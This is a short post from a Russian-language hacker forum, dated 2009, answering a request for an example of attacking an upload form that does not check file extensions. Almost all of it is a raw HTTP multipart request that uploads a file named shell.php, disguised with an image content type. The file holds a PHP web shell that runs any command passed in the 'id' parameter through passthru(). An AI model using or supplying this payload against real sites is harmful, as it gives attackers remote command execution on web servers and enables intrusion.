29.12.2009, 13:19
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
можешь небольшой пример привести?
Если расширение не проверяется, то можно заюзать что-нибудь типа такого запроса
Код:
POST http://127.0.0.1/upload/ HTTP/1.1
Host: localhost
Referer: http://127.0.0.1/index.php
Cookie: PHPSESSID=$session_id
Content-Length: 1024
Content-Type: multipart/form-data; boundary="6G+f"
--6G+f
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
--6G+f
Content-Disposition: form-data; name="uploaded"; filename="shell.php"
Content-Type: image/jpeg
<?php
if (isset ($_GET['id']) && !empty ($_GET['id']))
passthru ($_GET['id']);
else
echo "Empty";
?>
--6G+f
Content-Disposition: form-data; name="Upload"
Upload
--6G+f--
|
|
|